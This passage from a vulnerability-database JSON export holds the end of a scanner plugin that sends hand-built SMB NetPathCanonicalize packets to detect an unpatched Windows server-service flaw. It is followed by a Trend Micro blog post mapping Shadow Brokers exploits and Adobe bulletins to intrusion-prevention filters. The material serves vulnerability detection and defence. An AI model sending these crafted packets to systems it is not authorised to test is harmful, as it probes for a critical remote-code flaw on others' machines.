0x00, 0x08, 0xc5, 0xa6,\n 0x00, 0x08, 0xc0, 0x01, 0x10, 0x00, 0x00, 0x64,\n 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x54, 0x00, 0x64, 0x00, 0x54, 0x00, 0x02,\n 0x00, 0x26, 0x00, 0x00, 0x40, 0x75, 0x00, 0x00,\n 0x5c, 0x00, 0x50, 0x00, 0x49, 0x00, 0x50, 0x00,\n 0x45, 0x00, 0x5c, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00,\n 0x64, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,\n 0x4c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1f, 0x00,\n 0x00, 0x00, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,\n 0x6d, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00,\n 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x07, 0x00, 0x00, 0x00, 0x4f, 0x00, 0x70, 0x00,\n 0x65, 0x00, 0x6e, 0x00, 0x56, 0x41, 0x53, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:netpath_can_req );\nnetpath_can_resp = smb_recv( socket:soc );\nif( ! netpath_can_resp ) {\n close( soc );\n exit( 0 );\n}\n\n## SRVSVC NetPathCanonicalize request\nnetpath_req = raw_string(0x00, 0x00, 0x00, 0xac, 0xff, 0x53, 0x4d, 0x42,\n 0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0xc5, 0xa6,\n 0x00, 0x08, 0x00, 0x02, 0x10, 0x00, 0x00, 0x58,\n 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x54, 0x00, 0x58, 0x00, 0x54, 0x00, 0x02,\n 0x00, 0x26, 0x00, 0x00, 0x40, 0x69, 0x00, 0x00,\n 0x5c, 0x00, 0x50, 0x00, 0x49, 0x00, 0x50, 0x00,\n 0x45, 0x00, 0x5c, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00,\n 0x58, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,\n 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1f, 0x00,\n 0x00, 0x00, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,\n 0x6d, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00,\n 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:netpath_req );\nnetpath_resp = smb_recv( socket:soc );\nif( ! netpath_resp ) {\n close( soc );\n exit( 0 );\n}\n\n## SMB Tree Disconnect Request\nsmb_tree_dis_req = raw_string(0x00, 0x00, 0x00, 0x23, 0xff, 0x53, 0x4d, 0x42,\n 0x71, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0xc5, 0xa6,\n 0x00, 0x08, 0x40, 0x02, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_tree_dis_req );\nsmb_tree_dis_resp = smb_recv( socket:soc );\nif( ! smb_tree_dis_resp ) {\n close( soc );\n exit( 0 );\n}\n\n## SMB Logoff AndX Request\nsmb_logoff_req = raw_string(0x00, 0x00, 0x00, 0x27, 0xff, 0x53, 0x4d, 0x42,\n 0x74, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x08, 0x80, 0x02, 0x02, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_logoff_req );\nsmb_logoff_resp = smb_recv( socket:soc );\nif( ! smb_logoff_resp ) {\n close( soc );\n exit( 0 );\n}\n\nclose( soc );\n\n## After applying the patch these fields will filled with '00'\nif( strlen( netpath_resp ) > 98 &&\n ord( netpath_resp[88] ) == 79 && ord( netpath_resp[90] ) == 112 &&\n ord( netpath_resp[92] ) == 101 && ord( netpath_resp[94] ) == 110 &&\n ord( netpath_resp[96] ) == 86 && ord( netpath_resp[97] ) == 65 &&\n ord( netpath_can_resp[98] ) == 83 ) {\n security_message( port:port );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2017-05-01T13:42:31", "bulletinFamily": "blog", "description": "![](http://blog.trendmicro.com/wp-content/uploads/2016/04/TP-WeeklyBlog-300x205-300x205.jpg)\n\nI\u2019ve never been one to adopt the latest fashion trends, aside from what I wore growing up in the 1980s. I wore shoulder pads, blue eyeliner, designer jeans, and even parachute pants. While I continue to rock my 80s hair to this day, other trends I thought were long gone are making a comeback. (Shoulder pads \u2013 seriously?) History tends to repeat itself \u2013 what\u2019s old is new again \u2013 and it\u2019s no different in the security world.\n\n \n\nLast weekend, a group known as \u201cShadow Brokers\u201d released a large set of tools that can exploit flaws in several versions of Microsoft products and other platforms. A number of the exploits have CVEs that date as far back as 2001. In fact, one of the exploits named \u201cEwokFrenzy\u201d was discovered through our Zero Day Initiative over 10 years ago. Customers with TippingPoint solutions have had coverage for EwokFrenzy through Digital Vaccine\u00ae (DV) filter 4033 since **January 2006!**\n\nOur TippingPoint DVLabs team continues to review the contents associated with the Shadow Brokers disclosure to recommend coverage for TippingPoint solutions. The following table includes the DV filters that provide protection, including new filters released in an out-of-band release this week:\n\n** Exploit Name** | ** MS Bulletin** | ** CVE/ZDI** | ** Filters** | ** 0day?** | ** Status** \n---|---|---|---|---|--- \nDoublePulsar \n(Payload) | | | *27935 | N/A | Policy Filter \nEarlyShovel | | | *27938 | Unknown | Detects Exploit \nEasyBee** | | CVE-2007-1675 \nZDI-07-011 | | No | Investigating \nEasyPi | | | | Unknown | Investigating \nEbbisLand | | CVE-2001-0236 | 621, 622, 3512, 3791 | No | Investigating \nEchoWrecker | | CVE-2003-0201 | 1676 | No | Investigating \nEclipsedWing | MS08-067 | CVE-2008-4250 | 6515 | No | Detects Exploit \nEducatedScholar | MS09-050 | | 8465 | No | Detects Exploit \nELV | MS06-040 | CVE-2006-3439 | 9317 | No | Detects Exploit \nEmeraldThread | MS10-061 | | 10458, *27939 | No | Detects Exploit \nEmphasisMine | | | | Unknown | Investigating \nEnglishManDentist | | | | Unknown | Investigating \nErraticGopher | | | *27932 | Yes | Detects Exploit \nESKE | | CVE-2003-0352 | | No | Investigating \nEskimoRoll | MS14-068 | CVE-2014-6324 | *27940 | No | Exploit Unfilterable \nPolicy Filter \nEsteemAudit | | | *27933 | Yes | Detects Exploit \nEternalBlue | MS17-010 | | 27433, 27711, *27928 | No | Detects Exploit \nEternalChampion | MS17-010 | CVE-2017-0146 | 27433, 27711, *27929 | No | Detects Exploit \nEternalRomance | MS17-010 | | | No | Investigating \nEternalSynergy | MS17-010 | CVE-2017-0714 | *27937 | No | Detects Exploit \nEtre | | | | No | Investigating \nEVFR | | CVE-2003-0109 | 1612 | No | Detects Exploit \nEwokFrenzy | | CVE-2007-1675 \nZDI-07-011 | 4033 | No | Detects Exploit \nExplodingCan | | CVE-2017-7269 | 27643 | No | Detects Exploit \n* New DV filter \n**Identical to EwokFrenzy, but exploit untested against filter \n \n \n\n[Click here](<https://success.trendmicro.com/solution/1117192>) for more information on Trend Micro\u2019s response and recommendations for coverage across all Trend Micro products.\n\n**Adobe Update**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Adobe Security Bulletins released on or before April 6, 2017.The following table maps Digital Vaccine filters to the Adobe updates. Filters marked with an asterisk (*) shipped prior to this DV package, providing preemptive zero-day protection for customers. You can get more detailed information on this month\u2019s Adobe security updates from Dustin Childs\u2019 [April 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/4/11/the-april-2017-security-update-review>):\n\n**Bulletin #** | **CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|---|--- \nAPSB17-10 | CVE-2017-3058 | 27698 | \nAPSB17-10 | CVE-2017-3059 | *27697 | \nAPSB17-10 | CVE-2017-3060 | 27832 | \nAPSB17-10 | CVE-2017-3061 | 27833 | \nAPSB17-10 | CVE-2017-3062 | *27533 | \nAPSB17-10 | CVE-2017-3063 | *27534 | \nAPSB17-10 | CVE-2017-3064 | 27836 | \nAPSB17-11 | CVE-2017-3013 | 27923, 27925 | \nAPSB17-11 | CVE-2017-3014 | 27824 | \nAPSB17-11 | CVE-2017-3017 | 27827 | \nAPSB17-11 | CVE-2017-3019 | *26521 | \nAPSB17-11 | CVE-2017-3020 | *26491 | \nAPSB17-11 | CVE-2017-3021 | *26510 | \nAPSB17-11 | CVE-2017-3022 | *26631 | \nAPSB17-11 | CVE-2017-3023 | *26535 | \nAPSB17-11 | CVE-2017-3024 | 27829 | \nAPSB17-11 | CVE-2017-3025 | 27851 | \nAPSB17-11 | CVE-2017-3026 | 27852 | \nAPSB17-11 | CVE-2017-3027 | 27909 | \nAPSB17-11 | CVE-2017-3028 | *27160 | \nAPSB17-11 | CVE-2017-3029 | *27159 | \nAPSB17-11 | CVE-2017-3030 | 27823 | \nAPSB17-11 | CVE-2017-3031 | *27241, *27260 | \nAPSB17-11 | CVE-2017-3032 | *27158 | \nAPSB17-11 | CVE-2017-3033 | *27261 | \nAPSB17-11 | CVE-2017-3034 | *27225 | \nAPSB17-11 | CVE-2017-3035 | *27236 | \nAPSB17-11 | CVE-2017-3036 | *27304 | \nAPSB17-11 | CVE-2017-3037 | 27849 | \nAPSB17-11 | CVE-2017-3038 | 27908 | \nAPSB17-11 | CVE-2017-3039 | 27905 | \nAPSB17-11 | CVE-2017-3041 | 27903 | \nAPSB17-11 | CVE-2017-3043 | N/A | Local Vulnerability \nAPSB17-11 | CVE-2017-3042 | *27554, *27556, *27557, *27811 | \nAPSB17-11 | CVE-2017-3044 | 27914 | \nAPSB17-11 | CVE-2017-3045 | 27915 | \nAPSB17-11 | CVE-2017-3046 | 27916 | \nAPSB17-11 | CVE-2017-3047 | 27919 | \nAPSB17-11 | CVE-2017-3048 | *27750 | \nAPSB17-11 | CVE-2017-3049 | 27922 | \nAPSB17-11 | CVE-2017-3050 | *27808 | \nAPSB17-11 | CVE-2017-3051 | *27749 | \nAPSB17-11 | CVE-2017-3052 | *27748 | \nAPSB17-11 | CVE-2017-3053 | *27704 | \nAPSB17-11 | CVE-2017-3054 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3055 | *27522 | \nAPSB17-11 | CVE-2017-3056 | *27520 | \nAPSB17-11 | CVE-2017-3057 | *27521 | \nAPSB17-11 | CVE-2017-3011 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3012 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3015 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3018 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3039 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3040 | N/A | Insufficient Information \nAPSB17-11 | CVE-2017-3065 | N/A | Insufficient Information \n \n \n\n**Zero-Day Filters**\n\nThere are 13 new zero-day filters covering four vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Adobe (10)_**\n\n| \n\n * 27812: ZDI-CAN-4572: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 27820: ZDI-CAN-4571: Zero Day Initiative Vulnerability (Adobe Acrobat Reader DC)\n * 27821: ZDI-CAN-4570: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 27822: ZDI-CAN-4569: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 27832: HTTP: Adobe Flash length Memory Corruption Vulnerability (ZDI-17-247, ZDI-17-248)\n * 27914: HTTP: Adobe Acrobat Pro DC JPEG2000 Buffer Overflow Vulnerability (ZDI-17-267)\n * 27915: HTTP: Adobe Acrobat Pro DC JPEG2000 Memory Corruption Vulnerability (ZDI-17-268)\n * 27916: HTTP: Adobe Acrobat Pro DC JPEG2000 Memory Corruption Vulnerability (ZDI-17-270)\n * 27919: HTTP: Adobe Acrobat Pro DC Annotations Use-After-Free Vulnerability (ZDI-17-271)\n * 27922: HTTP: Adobe Acrobat Pro DC ImageConversion Buffer Overflow Vulnerability (ZDI-17-273)**_ _** \n---|--- \n| \n \n**_Cisco (1)_**\n\n| \n\n * 27807: ZDI-CAN-4635: Zero Day Initiative Vulnerability (Cisco License Manager Server) \n---|--- \n| \n \n**_MIcrosoft (1)_**\n\n| \n\n * 27810: ZDI-CAN-4573: Zero Day Initiative Vulnerability (Microsoft Internet Explorer)**_ _** \n---|--- \n| \n \n**_Trend Micro (1)_**\n\n| \n\n * 27804: ZDI-CAN-4638-4639: Zero Day Initiative Vulnerability (Trend Micro Control Manager)**_ _** \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-april-10-2017/>).", "modified": "2017-04-21T18:23:45", "published": "2017-04-21T18:23:45", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-april-17-2017/", "id": "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of April 17, 2017", "type": "trendmicroblog", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}